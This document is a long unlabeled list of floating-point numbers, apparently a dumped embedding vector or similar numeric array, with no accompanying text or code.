-0.017212586477398872, 0.03496060520410538, 0.016881877556443214, -0.016110224649310112, 0.0185826625674963, -0.020456677302718163, -0.03653540462255478, 0.025637775659561157, -0.05414169281721115, 0.009968496859073639, -0.017732270061969757, -0.037889737635850906, 0.01257479377090931, -0.01039369311183691, -0.015866130590438843, -0.022157464176416397, -0.01541731134057045, -0.019952740520238876, 0.01888187602162361, -0.019275575876235962, -0.011960620991885662, -0.02182675525546074, 0.013385816477239132, 0.023685021325945854, -0.000541830318979919, 0.025716517120599747, 0.00786613579839468, -0.0016220459947362542, 0.031748007982969284, 0.005425192881375551, -0.02119683474302292, -0.022157464176416397, 0.014212587848305702, 0.008811017498373985, -0.030078718438744545, 0.014913374558091164, -0.01888187602162361, -0.0016043295618146658, 0.004417319782078266, -0.015362193807959557, -0.014763768762350082, 0.03914957866072655, -0.032204702496528625, -0.005881885532289743, -0.03234643116593361, 0.010141724720597267, -0.014637784101068974, 0.010110228322446346, 0.03011021390557289, 0.005220468621701002, 0.04724406078457832, -0.032220449298620224, 0.012448810040950775, 0.0057165310718119144, -0.0003801670391112566, 0.028251947835087776, -0.003521651029586792, 0.014692902565002441, 0.0070039317943155766, -0.0068425145000219345, -0.01229920331388712, -0.0008636804413981736, 0.014338572509586811, 0.007649600505828857, 0.003564957994967699, 0.019716521725058556, -0.007972435094416142, -0.004196847323328257, -0.0213385671377182, 0.001741140498779714, -0.004279524553567171, -0.01320471428334713, 0.017102349549531937, -0.0009104324271902442, 0.004775587003678083, 0.03930705785751343, 0.018456678837537766, 0.0077165295369923115, -0.022173212841153145, -0.016960617154836655, 0.008669285103678703, -0.023291321471333504, 0.005303145851939917, 0.010338574647903442, 0.018393687903881073, -0.03272438421845436, 0.009881882928311825, -0.008889757096767426, -0.00814172625541687, -0.01811022311449051, -0.0084960563108325, 0.023055100813508034, -0.002811021637171507, -0.012346447445452213, 0.02450391836464405, -0.02300785668194294, -0.014976367354393005, 0.01889762468636036, 0.052692875266075134, -0.004905508365482092, -0.016393689438700676, 0.04132280498743057, 0.004901571199297905, -0.02948029339313507, -0.019622033461928368, 0.002462596632540226, -0.005468499846756458, -0.013338573276996613, 0.011866132728755474, 0.0037480287719517946, 0.005606295075267553, 0.014181091450154781, 0.06727553904056549, -0.0025373997632414103, 0.0021318881772458553, 0.02568501979112625, 0.010188968852162361, 0.011251959949731827, 0.010007866658270359, 0.007677159737795591, 0.03137005493044853, -0.03581099584698677, 0.04229918122291565, -0.012212589383125305, 0.015944870188832283, 0.05231492221355438, -0.02064565382897854, -0.017039356753230095, -0.006393696181476116, -0.04371650144457817, -0.02837793156504631, 0.01911809667944908, -0.011055110022425652, -0.0025748012121766806, -0.012543297372758389, -0.007141727022826672, 0.004964563064277172, -0.026913365349173546, 0.03439367562532425, -0.01667715236544609, 0.004440941382199526, 0.0017283451743423939, -0.02269289642572403, 0.04371650144457817, -0.025118092074990273, 0.028897617012262344, 0.01588975265622139, 0.015275578945875168, 0.0041299182921648026, 0.011212590150535107, -0.01746455393731594, -0.013094478286802769, 0.02182675525546074, 0.02188974805176258, 0.00838582031428814, -0.01801573485136032, -0.0015570854302495718, 0.02694486267864704, -0.007736214902251959, -0.044062960892915726, -0.028913363814353943, -0.027401555329561234, 0.02798423171043396, 0.0015757862711325288, 0.018692899495363235, -0.0028523600194603205, -0.02307084947824478, -0.014362194575369358, 0.026755886152386665, -0.01482676062732935, -0.0009645661921240389, -0.04466138407588005, 0.00980314239859581, 0.002395667601376772, 0.01985825225710869, -0.008051175624132156, -0.016897626221179962, 0.008393694646656513, 0.000005524878815776901, -0.013889753259718418, 0.002596454694867134, -0.008574796840548515, 0.0014547233004122972, 0.00280708447098732, -0.018078727647662163, 0.002332675503566861, 0.008370072580873966, -0.005129917524755001, -0.004692909773439169, -0.006366136949509382, 0.034425172954797745, -0.01004723645746708, -0.008984245359897614, 0.01803148351609707, 0.006102357525378466, -0.021795259788632393, 0.015125973150134087, 0.006590546108782291, -0.019622033461928368, -0.028314940631389618, -0.005295271519571543, -0.0005172240198589861, 0.01777951419353485, 0.008614166639745235, -0.007433065213263035, 0.009228339418768883, 0.002066927496343851, 0.0020354315638542175, -0.0162204597145319, -0.007696844637393951, -0.0014694870915263891, 0.04283461347222328, 0.029527537524700165, 0.0497952401638031, -0.006948813796043396, -0.002080707112327218, 0.009314953349530697, -0.018519671633839607, -0.028346436098217964, 0.012653534300625324, 0.008685032837092876, -0.0185826625674963, 0.0031574780587106943, -0.007858261466026306, -0.008433064445853233, 0.012866131961345673, 0.03883461654186249, 0.004594484809786081, 0.02467714622616768, 0.006338578183203936, -0.017259830608963966, -0.026913365349173546, -0.007192907854914665, 0.012118101119995117, -0.02426769770681858, 0.00837794691324234, -0.0020925181452184916, -0.002057085046544671, 0.02552754059433937, 0.025795256718993187, 0.01691337302327156, -0.005275586619973183, -0.007204718887805939, -0.009622040204703808, -0.006452751345932484, 0.0029566907323896885, 0.001388778444379568, -0.0007396648288704455, -0.013062982819974422, -0.007543301675468683, 0.026692893356084824, -0.026377933099865913, -0.0025236201472580433, -0.05351177230477333, -0.023669274523854256, 0.0026476357597857714, 0.026110216975212097, -0.0036299186758697033, 0.014480303972959518, 0.011992117390036583, 0.012440935708582401, 0.015299201011657715, -0.01379526499658823, -0.005858263466507196, 0.023905493319034576, -0.02064565382897854, -0.0050747995264828205, -0.021055102348327637, 0.024787383154034615, -0.029700765386223793, 0.01213384885340929, -0.008669285103678703, -0.01430707611143589, -0.0005078736576251686, 0.019574789330363274, -0.005440941080451012, -0.030094465240836143, 0.005681097973138094, 0.015409437008202076, 0.010960621759295464, -0.046047210693359375, -0.010133850388228893, -0.05231492221355438, 0.027055097743868828, -0.029385805130004883, -0.04258264601230621, 0.011842510662972927, 0.010228338651359081, 0.01427557971328497, -0.008708654902875423, 0.027007853612303734, 0.008889757096767426, 0.020031481981277466, -0.012181092984974384, 0.011677157133817673, -0.0008592513622716069, 0.006830703467130661, -0.008011804893612862, 0.0008100387640297413, -0.008118104189634323, -0.013062982819974422, 0.009622040204703808, 0.0004416827578097582, -0.011803140863776207, 0.012787392362952232, -0.010590543039143085, -0.00001699371205177158, -0.0012037393171340227, -0.016015736386179924, 0.03218895196914673, -0.014322823844850063, -0.02599998004734516, 0.018755892291665077, -0.04081886634230614, 0.0002059545658994466, -0.03681886941194534, 0.004314957652240992, -0.005578735843300819, 0.007909443229436874, 0.039810992777347565, -0.02181100659072399, 0.008338576182723045, -0.013393690809607506, -0.022803133353590965, 0.0006850388599559665, -0.028740135952830315, -0.011732274666428566, 0.009700779803097248, 0.00336810783483088, 0.007129915989935398, 0.005488184746354818, 0.01612597145140171, -0.010960621759295464, 0.007421254180371761, -0.03999996930360794, 0.020834630355238914, -0.00014013277541380376, 0.016629908233880997, -0.01888187602162361, 0.02299210987985134, 0.00590944429859519, -0.00010242364805890247, -0.03360627591609955, 0.005303145851939917, -0.002277557272464037, -0.020220456644892693, 0.0016456680605188012, -0.013299202546477318, -0.004326768685132265, 0.031826749444007874, 0.02971651405096054, 0.019039355218410492, 0.017133845016360283, 0.02957478165626526, -0.001031495281495154, -0.019401559606194496, -0.0028917300514876842, 0.0013159438967704773, 0.029275568202137947, -0.01874014362692833, 0.010102354921400547, -0.008220466785132885, -0.04472437500953674, -0.0005413381732068956, 0.024881871417164803, -0.013834635727107525, -0.0008582670707255602, -0.04938578978180885, -0.00873227696865797, -0.01692912168800831, -0.01840943470597267, -0.009125977754592896, 0.023590533062815666, -0.02031494490802288, -0.0002817419299390167, 0.012047234922647476, -0.01683463342487812, 0.019984237849712372, -0.007980309426784515, 0.014480303972959518, -0.0014399595092982054, 0.003685036674141884, -0.0010246055899187922, 0.01801573485136032, 0.023149589076638222, -0.013598415069282055, 0.011968495324254036, -0.005712594371289015, -0.022960612550377846, -0.021480299532413483, 0.0021732267923653126, 0.0035393675789237022, -0.0024586596991866827, -0.00928345788270235, -0.0028799190185964108, 0.03026769496500492, 0.004633855074644089, -0.016708649694919586, -0.011417314410209656, -0.03132281079888344, -0.006566924508661032, -0.008834639564156532, 0.009755898267030716, -0.01533857174217701, -0.005523617845028639, -0.01181101519614458, 0.02696060948073864, 0.027480294927954674, -0.006515743210911751, -0.010929125361144543, 0.007429128512740135, -0.006783459335565567, -0.007594482507556677, 0.007137789856642485, -0.016897626221179962, -0.01787400245666504, -0.009023615159094334, -0.010606291703879833, -0.007460624445229769, 0.0387401282787323, -0.007444876246154308, 0.012708651833236217, -0.01174014899879694, 0.01095274742692709, 0.010811015963554382, -0.03858264908194542, -0.012968494556844234, 0.005177161656320095, -0.005618106108158827, 0.022031480446457863, 0.01943305693566799, -0.005862200167030096, -0.010842511430382729, 0.0022401558235287666, -0.010551173239946365, -0.010779519565403461, -0.021858250722289085, -0.00012746053107548505, 0.004972437396645546, -0.050708625465631485, 0.025952735915780067, -0.002659446792677045, -0.011472432874143124, -0.03455115482211113, -0.009748023934662342, 0.012283455580472946, -0.0033917296677827835, -0.018283450976014137, -0.029999976977705956, 0.013047234155237675, 0.02371651865541935, -0.006515743210911751, -0.03710233420133591, -0.023212581872940063, 0.0039527527987957, 0.017999986186623573, -0.030377930030226707, -0.02670864202082157, 0.003277556737884879, 0.007314955350011587, 0.012677156366407871, 0.0009916331619024277, -0.025590531527996063, -0.00877164676785469, 0.013913375325500965, -0.012110227718949318, -0.008850387297570705, 0.029039349406957626, -0.006318892817944288, -0.0316220223903656, 0.015330697409808636, -0.007944876328110695, -0.00590944429859519, 0.01249605417251587, 0.006637790240347385, 0.005440941080451012, 0.01478739082813263, -0.0009192906436510384, 0.016582664102315903, -0.019228331744670868, -0.008559049107134342, -0.02941730059683323, 0.041606269776821136, -0.011212590150535107, 0.049133822321891785, -0.003293304704129696, 0.006732278503477573, -0.007649600505828857, 0.00003105005089309998, 0.0015118098817765713, -0.001598424045369029, 0.009669284336268902, 0.00758660864084959, -0.02932281233370304, 0.03691335767507553, -0.013858257792890072, 0.01722833327949047, -0.0033917296677827835, -0.017291326075792313, -0.011047235690057278, -0.031433045864105225, -0.006141727790236473, -0.007062986958771944, 0.01683463342487812, 0.015874003991484642, 0.03836217522621155, 0.00018565439677331597, -0.011519676074385643, -0.04157477244734764, 0.003293304704129696, -0.00363582419231534, -0.03445666655898094, 0.013842509128153324, -0.015307075344026089, -0.019480301067233086, -0.004901571199297905, 0.017275577411055565, 0.009700779803097248, -0.010425189509987831, 0.021086597815155983, 0.0012332667829468846, 0.008149600587785244, -0.0020492111798375845, -0.04157477244734764, 0.006248027086257935, 0.02182675525546074, -0.009267710149288177, -0.010425189509987831, 0.017606286332011223, -0.004606295842677355, 0.009519677609205246, 0.01921258494257927, 0.010141724720597267, 0.008133851923048496, -0.02507084794342518, -0.023779509589076042, 0.009653536602854729, -0.020141717046499252, -0.03297635540366173, 0.008133851923048496, 0.013803139328956604, -0.009976370260119438, -0.014913374558091164, -0.026346437633037567, 0.0018553135450929403, 0.019779512658715248, 0.010086607187986374, -0.008267709985375404, -0.005933066364377737, -0.004944878164678812, 0.004586610943078995, -0.015858255326747894, 0.05385822802782059, -0.016007862985134125, 0.0032421236392110586, -0.016251957044005394, -0.008196844719350338, -0.01683463342487812, 0.012842509895563126, -0.0002871553006116301, 0.013496053405106068, -0.03335430473089218, 0.008905504830181599, -0.011637786403298378, -0.026614153757691383, -0.025795256718993187, -0.004637791775166988, 0.0018248017877340317, 0.008850387297570705, -0.006354325916618109, 0.008527552708983421, -0.013936997391283512, -0.0217480156570673, -0.004464563447982073, 0.00725590018555522, -0.015283453278243542, 0.025275571271777153, -0.00038828712422400713, -0.008480308577418327, 0.015330697409808636, -0.026283444836735725, -0.019039355218410492, 0.009645662270486355, 0.02743305079638958, -0.03543304651975632, -0.003722438123077154, 0.0011161408619955182, -0.014212587848305702, 0.010488181374967098, -0.002925194799900055, -0.011905503459274769, -0.008590544573962688, -0.0011368101695552468, -0.026346437633037567, -0.03398422524333, 0.005602357909083366, 0.007779521867632866, 0.09738575667142868, 0.026614153757691383, -0.01209447905421257, 0.0035295248962938786, -0.0316220223903656, -0.0040393671952188015, 0.0020925181452184916, 0.013574793003499508, 0.02228344790637493, 0.002358265919610858, 0.025007855147123337, -0.0040393671952188015, -0.011055110022425652, 0.02088187448680401, -0.017685025930404663, -0.010299204848706722, 0.010346448980271816, 0.014952745288610458, 0.021448802202939987, 0.01921258494257927, 0.0008336608298122883, 0.02206297591328621, 0.013984241522848606, -0.01913384348154068, 0.02491336688399315, -0.01628345251083374, -0.01874014362692833, -0.004074800293892622, 0.0040590520948171616, -0.010141724720597267, -0.024787383154034615, -0.007775584701448679, 0.0024783445987850428, -0.0034212572500109673, 0.008393694646656513, 0.014740146696567535, 0.012708651833236217, 0.00361810764297843, 0.02151179499924183, -0.017448805272579193, -0.008535427041351795, -0.028440924361348152, 0.027921238914132118, -0.02885037288069725, -0.005196846555918455, -0.022110220044851303, 0.02544880099594593, 0.00448424881324172, 0.008818890899419785, -0.019653528928756714, -0.014055107720196247, -0.004220469389110804, 0.037354301661252975, 0.023811006918549538, -0.024645650759339333, 0.0046574766747653484, -0.008480308577418327, -0.003440942382439971, 0.022031480446457863, -0.017811009660363197, 0.011866132728755474, -0.01581888645887375, 0.009653536602854729, 0.0069370027631521225, -0.0031811001244932413, 0.002413384150713682, -0.028677145019173622, -0.0010866133961826563, -0.003704721573740244, 0.014370067976415157, 0.009259835816919804, -0.02031494490802288, 0.010826763696968555, -0.011393692344427109, 0.013881879858672619, 0.02766927145421505, -0.0014153532683849335, 0.010826763696968555, -0.03291336074471474, -0.0079015688970685, 0.011078732088208199, 0.018362190574407578, -0.006511806044727564, -0.015425185672938824, -0.007267711218446493, 0.03329131379723549, -0.00733070308342576, 0.000016793786926427856, 0.020614158362150192, -0.02672438882291317, 0.003287399187684059, 0.016188964247703552, -0.0084960563108325, 0.017606286332011223, 0.007110231090337038, 0.018677150830626488, 0.020598409697413445, 0.010188968852162361, -0.006059050559997559, -0.017763765528798103, 0.02275588922202587, 0.011936998926103115, -0.0012657471233978868, 0.004003934096544981, -0.014425186440348625, -0.005192909389734268, 0.020582662895321846, 0.024236202239990234, 0.005661413073539734, -0.008354324847459793, -0.03429918736219406, -0.006602357141673565, 0.0004229819751344621, -0.03448816388845444, -0.007767710834741592, -0.014125973917543888, -0.0068897586315870285, -0.0002070618502330035, 0.004181099124252796, -0.019023608416318893, -0.03946453705430031, -0.01825195550918579, 0.035055093467235565, -0.006137790624052286, -0.011236212216317654, -0.010590543039143085, 0.01651967316865921, -0.014220462180674076, 0.03157477825880051, 0.03581099584698677, 0.025023603811860085, 0.00010826763900695369, 0.007499994244426489, -0.012165345251560211, 0.04148028418421745, -0.01840943470597267, 0.023763762786984444, 0.009724401868879795, 0.0035610210616141558, -0.003832674352452159, 0.010456684976816177, 0.029118089005351067, 0.00845668651163578, 0.016188964247703552, 0.01952754519879818, 0.0008499009418301284, -0.018535420298576355, 0.0068936957977712154, 0.017889751121401787, 0.013393690809607506, -0.011968495324254036, 0.0030610214453190565, 0.035464540123939514, 0.03785824030637741, 0.008763773366808891, -0.002624013926833868, 0.023118093609809875, -0.028204703703522682, -0.012511801905930042, -0.0018494080286473036, 0.004145666025578976, 0.015259831212460995, 0.022078724578022957, 0.02165352739393711, 0.015370067209005356, 0.012897628359496593, 0.00900786742568016, -0.05889759585261345, -0.0031043284106999636, -0.023055100813508034, 0.01032282691448927, 0.0094881821423769, -0.03848816081881523, 0.014771643094718456, 0.023653525859117508, 0.03044092282652855, -0.01976376585662365, -0.021480299532413483, 0.0005093500367365777, 0.015346445143222809, -0.005826767534017563, -0.011519676074385643, -0.02933856099843979, -0.020535418763756752, 0.020582662895321846, -0.030692890286445618, 0.01929132454097271, 0.010464559309184551, -0.052220433950424194, 0.0019685025326907635, -0.00308464327827096, 0.015480303205549717, -0.0011230306699872017, -0.012220463715493679, -0.02307084947824478, -0.02149604633450508, 0.010574795305728912, -0.0331968255341053, -0.002039368497207761, -0.002673226408660412, -0.011566920205950737, 0.0225196685642004, -0.004988185130059719, -0.00037499971222132444, 0.01035432331264019, -0.0005516728269867599, 0.003669288707897067, 0.004346453584730625, -0.021385811269283295, 0.0005757869803346694, -0.026834625750780106, -0.02552754059433937, -0.013582667335867882, 0.00559448404237628, 0.030456669628620148, -0.00422834325581789, 0.030614150688052177, -0.04626768082380295, 0.02188974805176258, 0.010866133496165276, 0.000019761919247685, 0.007539364509284496, -0.001040353556163609, 0.03050391376018524, -0.013834635727107525, -0.005952751729637384, 0.01667715236544609, -0.018944868817925453, -0.001785431755706668, 0.008267709985375404, 0.00952755194157362, 0.020188961178064346, 0.007023616693913937, -0.005015744362026453, -0.005492121912539005, -0.008330702781677246, -0.0021633843425661325, 0.010582669638097286, 0.02047242596745491, -0.0324094258248806, 0.024173211306333542, -0.005011807195842266, 0.0022795258555561304, 0.007980309426784515, -0.013102352619171143, -0.0003654032771009952, 0.016740145161747932, 0.037984222173690796, 0.001298227347433567, 0.022551164031028748, -0.01202361285686493, 0.004358264617621899, 0.00422834325581789, -0.004527555778622627, 0.0009965543868020177, 0.006283459719270468, 0.008035426959395409, 0.00029010805883444846, 0.018771639093756676, -0.03423619642853737, -0.00559448404237628, -0.011566920205950737, 0.005393696948885918, -0.0019399592420086265, -0.013976367190480232, 0.014062982052564621, -0.03842516988515854, -0.015606287866830826, -0.02544880099594593, -0.021606283262372017, -0.020834630355238914, 0.005251964554190636, -0.0026181084103882313, -0.01438581570982933, -0.0019438961753621697, -0.006011806428432465, 0.005984247662127018, -0.0280629713088274, -0.010299204848706722, 0.005893696565181017, 0.009653536602854729, 0.050551142543554306, -0.005055114161223173, -0.013015738688409328, 0.023370061069726944, 0.026818877086043358, -0.017685025930404663, -0.01426770631223917, 0.0008425190462730825, -0.012582668103277683, -0.011173220351338387, 0.02055116556584835, -0.005681097973138094, -0.01826770231127739, 0.010968496091663837, 0.0011151566868647933, -0.03266139328479767, 0.03748028725385666, 0.0013976367190480232, -0.011338573880493641, 0.026740137487649918, 0.014212587848305702, 0.03968501091003418, 0.017842506989836693, 0.004232280422002077, 0.011629913002252579, -0.017984239384531975, -0.010519676841795444, 0.006547239143401384, -0.002309053437784314, 0.03461414948105812, 0.0024921242147684097, -0.02585824951529503, -0.02143305540084839, 0.0003991138655692339, 0.01296062022447586, -0.012464557774364948, 0.011133849620819092, -0.02894486114382744, -0.006346452049911022, -0.023149589076638222, 0.012952745892107487, -0.02497635968029499, -0.042803119868040085, -0.004728342872112989, -0.006299207918345928, 0.004267713520675898, 0.004893697332590818, -0.008173222653567791, -0.005657475907355547, 0.027606278657913208, 0.00337795028463006, 0.002391730435192585, 0.012984242290258408, 0.010763771831989288, -0.003746060188859701, 0.0010511802975088358, 0.0023877935018390417, -0.010936999693512917, -0.008842512965202332, -0.03993697836995125, 0.013133849017322063, -0.026850374415516853, -0.0068661365658044815, 0.02584250085055828, -0.0034685013815760612, 0.0162204597145319, -0.01485825702548027, 0.008362198248505592, -0.005409444682300091, -0.03026769496500492, -0.007685033604502678, 0.005196846555918455, -0.005586610175669193, -0.006625979207456112, 0.02064565382897854, 0.007385821547359228, -0.003212596056982875, -0.013173218816518784, -0.006421254947781563, -0.02220470830798149, -0.0020984236616641283, 0.017181089147925377, -0.0031909425742924213, -0.010503929108381271, 0.005484248045831919, -0.018692899495363235, -0.012629912234842777, -0.0004955704789608717, 0.012047234922647476, -0.023748014122247696, -0.0019478332251310349, -0.0045433035120368, 0.004921256098896265, -0.006645664572715759, -0.00531495688483119, 0.028913363814353943, -0.013149596750736237, -0.0296535212546587, 0.025322815403342247, -0.0008046253933571279, 0.036157455295324326, -0.008307080715894699, -0.013503926806151867, -0.013354321010410786, -0.010960621759295464, -0.024472422897815704, 0.011511802673339844, -0.014480303972959518, -0.00904723722487688, 0.016173215582966805, 0.013031486421823502, -0.012433061376214027, 0.0608818456530571, -0.01564565859735012, -0.019622033461928368, 0.016157468780875206, -0.007484246511012316, 0.0006008853670209646, 0.004547240678220987, 0.01669290103018284, 0.01438581570982933, -0.022787384688854218, 0.012448810040950775, 0.006992120761424303, 0.007346451282501221, -0.01793699525296688, -0.029149584472179413, 0.0185826625674963, 0.0030433048959821463, 0.013826761394739151, -0.018944868817925453, 0.04560626670718193, -0.023023605346679688, -0.024708643555641174, -0.00047785398783162236, -0.02196848765015602, -0.011456684209406376, -0.019070852547883987, 0.016173215582966805, 0.00932282768189907, -0.02110234647989273, -0.014803138561546803, -0.05722830444574356, 0.027228325605392456, 0.0027381868567317724, -0.0009630898130126297, -0.019511796534061432, 0.01181101519614458, 0.03722831979393959, 0.001236219541169703, 0.03804721683263779, 0.014653532765805721, 0.005688972305506468, -0.015370067209005356, -0.021086597815155983, -0.00723621528595686, 0.014417312107980251, 0.005177161656320095, -0.005641728173941374, -0.010173221118748188, -0.0007987198769114912, -0.0002159201103495434, 0.002147636143490672, 0.004421256482601166, 0.0001334890694124624, -0.0014832665910944343, 0.008740151301026344, 0.006944876629859209, -0.02149604633450508, 0.0051653506234288216, -0.018519671633839607, 0.00225196685642004, -0.009275583550333977, 0.012543297372758389, -0.003316926769912243, -0.006531491409987211, 0.0029429111164063215, -0.004141729325056076, 0.02885037288069725, 0.010377945378422737, -0.015307075344026089, 0.029936986044049263, 0.00729133328422904, 0.03335430473089218, 0.009692906402051449, -0.014874004758894444, -0.013669281266629696, -0.00063238141592592, -0.02228344790637493, 0.0174015611410141, 0.015220461413264275, 0.008149600587785244, -0.028740135952830315, -0.004460626747459173, -0.017133845016360283, -0.009188969619572163, 0.003277556737884879, 0.01035432331264019, -0.010968496091663837, 0.018834631890058517, 0.01984250545501709, 0.0007450781995430589, 0.015188965015113354, -0.0009773614583536983, 0.050015710294246674, 0.026425177231431007, 0.008511804975569248, -0.024724390357732773, 0.008685032837092876, 0.009196843951940536, 0.004251965321600437, 0.0013149596052244306, 0.005208657588809729, -0.001321849413216114, 0.014291328378021717, -0.0002112449292326346, 0.03066139481961727, 0.01011810265481472, 0.0007647632155567408, -0.009858260862529278, 0.0010255897650495172, 0.0022165337577462196, -0.0019625970162451267, 0.01659841276705265, -0.029196828603744507, 0.0006309050368145108, -0.008952748961746693, 0.005086610559374094, 0.010897629894316196, -0.015685027465224266, 0.00917322188615799, 0.006153538823127747, 0.03445666655898094, 0.010503929108381271, -0.012936998158693314, 0.011976368725299835, 0.0019606284331530333, -0.011141723953187466, -0.008007868193089962, 0.004393697716295719, 0.012748021632432938, -0.012566919438540936, -0.021999983116984367, -0.02514958754181862, 0.010165346786379814, -0.012929124757647514, -0.011314951814711094, -0.0042244065552949905, 0.009905504062771797, -0.005685035139322281, -0.00011355798778822646, -0.0033622023183852434, -0.03685036674141884, 0.012346447445452213, 0.009314953349530697, 0.001941927708685398, -0.014960618689656258, 0.020062977448105812, 0.006692908238619566, 0.015763767063617706, -0.018677150830626488, 0.004917319398373365, 0.007385821547359228, -0.009921252727508545, -0.018629906699061394, 0.0016190932365134358, -0.022393684834241867, -0.014078729785978794, -0.007338577415794134, -0.006437003146857023, -0.006488183978945017, 0.0010157473152503371, -0.0030196828301995993, -0.010062985122203827, 0.018677150830626488, 0.020251953974366188, -0.00896849762648344, -0.025165336206555367, 0.000011149721103720367, -0.02102360688149929, 0.02135431580245495, 0.031086592003703117, 0.009039363823831081, -0.0035964539274573326, 0.017921246588230133, 0.0049803112633526325, 0.001345471478998661, -0.004649602808058262, -0.011448810808360577, -0.005814956501126289, 0.001097440137527883, -0.0032716512214392424, 0.0003181592037435621, -0.0008553143125027418, 0.024566911160945892, -0.011803140863776207, -0.002415352500975132, 0.01905510388314724, -0.0068188924342393875, 0.027370058000087738, 0.013149596750736237, -0.03927556052803993, -0.017039356753230095, 0.01762203499674797, -0.00877164676785469, 0.00040255876956507564, -0.003149603959172964, -0.012425187975168228, -0.03675587847828865, -0.0031515725422650576, 0.005346452817320824, 0.0022893683053553104, -0.01683463342487812, -0.01589762605726719, -0.0067952703684568405, -0.014188965782523155, 0.006503932178020477, -0.01691337302327156, 0.01260629016906023, -0.006763774435967207, -0.006814955733716488, -0.011519676074385643, -0.007472435478121042, -0.0012785423314198852, 0.023700769990682602, 0.023685021325945854, 0.006511806044727564, -0.01149605493992567, -0.0041535403579473495, 0.009519677609205246, -0.0296535212546587, 0.006283459719270468, 0.009354324080049992, 0.011724400334060192, 0.01510235108435154, 0.011401566676795483, 0.004653539974242449, -0.003159446408972144, -0.016393689438700676, 0.007417317479848862, 0.006027554627507925, 0.017118098214268684, 0.02957478165626526, 0.007047238759696484, 0.008078734390437603, 0.015047232620418072, -0.02285037748515606, 0.003173226024955511, 0.013141722418367863, 0.0018602348864078522, 0.01296062022447586, 0.03231493756175041, -0.009425190277397633, -0.0005462594563141465, 0.017039356753230095, -0.0024665335658937693, -0.007346451282501221, -0.0036968477070331573, 0.005586610175669193, -0.004385823383927345, -0.015204712748527527, 0.0181732140481472, -0.00925196148455143, -0.012086605653166771, -0.013559045270085335, -0.0017283451743423939, 0.010826763696968555, -0.022645652294158936, -0.009795268066227436, 0.030803127214312553, 0.001412400510162115, -0.012346447445452213, 0.027244074270129204, 0.0016870066756382585, -0.018992111086845398, -0.03590548411011696, 0.010976369492709637, -0.004893697332590818, 0.03754327818751335, 0.020913369953632355, -0.003998028580099344, 0.015259831212460995, 0.025181083008646965, 0.005937003530561924, 0.01122046448290348, -0.004413382615894079, 0.0010265740565955639, 0.002129919594153762, -0.0013159438967704773, -0.011866132728755474, 0.013637784868478775, 0.006118105724453926, 0.009102355688810349, 0.017574790865182877, 0.022866124287247658, -0.004881886299699545, -0.013858257792890072, -0.028110215440392494, 0.0016249987529590726, -0.0229291170835495, -0.011559046804904938, 0.005673224106431007, -0.004074800293892622, 0.013724399730563164, 0.0032992102205753326, 0.008755899034440517, -0.026866121217608452, 0.006811018567532301, -0.0018681088695302606, 0.0038051153533160686, -0.006275585852563381, 0.004334642551839352, -0.005913381464779377, -0.0008996056276373565, -0.03710233420133591, -0.005775586236268282, 0.017496049404144287, 0.015850381925702095, -0.0004623520071618259, 0.021212583407759666, -0.0021653526928275824, -0.014724398963153362, 0.009425190277397633, -0.0003991138655692339, 0.015204712748527527, 0.024645650759339333, 0.002649604342877865, -0.00452361861243844, 0.0020295260474085808, 0.032755881547927856, -0.004870075266808271, 0.02009447291493416, -0.016094475984573364, -0.00030684031662531197, -0.006661412306129932, -0.012551171705126762, -0.012622037902474403, 0.005999995395541191, 0.00786219909787178, 0.003041336312890053, 0.006342514883726835, -0.0008789363782852888, -0.03653540462255478, 0.014566918835043907, -0.0049606263637542725, -0.007366136182099581, 0.0070078689604997635, 0.004625980742275715, 0.009433063678443432, 0.024299195036292076, 0.022472424432635307, 0.02662990242242813, -0.009826764464378357, -0.000021730422304244712, 0.018456678837537766, -0.001866140402853489, -0.020582662895321846, 0.014535422436892986, -0.003984249196946621, 0.02110234647989273, 0.01149605493992567, -0.00472440617159009, -0.003785430220887065, 0.007019679993391037, 0.007106293924152851, -0.01700786128640175, 0.005822830367833376, -0.010055110789835453, 0.007885821163654327, -0.0012057077838107944, 0.006047239527106285, 0.01732282154262066, 0.010291331447660923, 0.014259831979870796, 0.0007888773689046502, 0.004610233008861542, -0.008685032837092876, 0.009874008595943451, 0.004999996162950993, -0.0023444865364581347, 0.008440938778221607, -0.011322826147079468, 0.0008036411600187421, 0.015385815873742104, 0.00223425030708313, 0.004787398036569357, -0.019086599349975586, -0.013818887062370777, -0.002496061148121953, -0.006590546108782291, -0.004964563064277172, 0.0033877927344292402, -0.010055110789835453, -0.0002952753857243806, -0.03407871350646019, 0.017921246588230133, 0.006531491409987211, -0.0007844482315704226, -0.0008115151431411505, 0.004244091454893351, 0.002864171052351594, -0.009960622526705265, 0.009574796073138714, 0.015322823077440262, 0.0016673216596245766, 0.0020826756954193115, 0.00337007618509233, 0.035622019320726395, -0.02062990516424179, -0.02782675065100193, 0.013551170937716961, 0.010141724720597267, -0.017984239384531975, 0.008677158504724503, -0.011842510662972927, 0.011708652600646019, 0.007102356757968664, -0.019543292000889778, -0.00760629354044795, 0.008267709985375404, 0.014496052637696266, 0.009700779803097248, -0.00870078057050705, 0.00869290716946125, -0.015559043735265732, -0.00921259168535471, 0.02188974805176258, 0.013031486421823502, -0.004614169709384441, 0.003269682638347149, -0.014157470315694809, -0.019023608416318893, -0.0088976314291358, 0.019826756790280342, 0.004267713520675898, -0.02379525825381279, 0.01708660088479519, 0.004354327451437712, -0.006944876629859209, 0.010023614391684532, -0.0031141708604991436, 0.018708648160099983, -0.019905496388673782, 0.006767711602151394, -0.00011687983351293951, -0.01966927759349346, -0.012062983587384224, 0.0047952719032764435, -0.009165347553789616, -0.014251957647502422, 0.010078732855618, 0.013015738688409328, -0.0030472418293356895, -0.033952731639146805, 0.016850382089614868, 0.00753149064257741, -0.034582652151584625, 0.005503932945430279, 0.01482676062732935, -0.03074013441801071, 0.015755893662571907, 0.023889746516942978, 0.000197465400560759, 0.014007863588631153, -0.003401572350412607, -0.013732273131608963, -0.016094475984573364, 0.008220466785132885, 0.00529920868575573, -0.00618503475561738, 0.001655510626733303, 0.005086610559374094, 0.010622039437294006, 0.005283460486680269, 0.015566918067634106, -0.0005797239718958735, -0.01564565859735012, 0.010795267298817635, -0.015496051870286465, 0.02655116096138954, 0.01935431733727455, 0.005606295075267553, -0.002281494438648224, -0.009921252727508545, -0.005775586236268282, -0.015307075344026089, -0.023968486115336418, -0.008716529235243797, -0.0037637767381966114, -0.016724396497011185, 0.0059448773972690105, 0.0041062962263822556, -0.004767713136970997, 0.016251957044005394, -0.009874008595943451, -0.008007868193089962, 0.009496055543422699, -0.013874005526304245, 0.0090866070240736, 0.004287398420274258, -0.004685035906732082, 